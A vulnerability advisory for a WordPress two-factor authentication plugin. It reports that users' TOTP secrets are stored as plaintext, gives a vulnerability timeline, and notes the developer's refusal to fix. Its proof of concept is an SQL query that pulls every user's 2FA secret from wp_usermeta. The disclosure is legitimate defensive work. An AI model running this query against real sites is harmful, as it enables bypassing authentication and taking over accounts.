| Affected plugin | Google Authenticator |
| Active installs | 30,000+ |
| Vulnerable version | <= 0.54 |
| Audited version | 0.54 |
| Fully patched version | – |
| Recommended remediation | Removal of the plugin |
Description
The plugin stores users’ TOTP secret keys as plaintext in the database. An attacker that can obtain one of the seemingly never-ending read-only SQL-Injections will be able to bypass all 2FA checks for all users indefinitely.
Proof of concept
The plugin stores users’ TOTP secrets as plaintext in the “wp_usermeta” table.
// EDITOR: $GA_secret is just a random string.
update_user_option( $user_id, 'googleauthenticator_secret', $GA_secret, true );An attacker can abuse a read-only SQLi to compromise all two-factor checks for all users by getting the following SQL query to execute:
SELECT user_id, meta_value, meta_key FROM wp_usermeta WHERE meta_key = 'googleauthenticator_secret'Timeline
| Vendor contacted | September 12, 2022 |
| First Response | September 12, 2022 |
| Fully patched at | – |
| Publicly disclosed | April 24, 2023 |
Miscellaneous
- The developer did not consider this a security issue.
Leave a Reply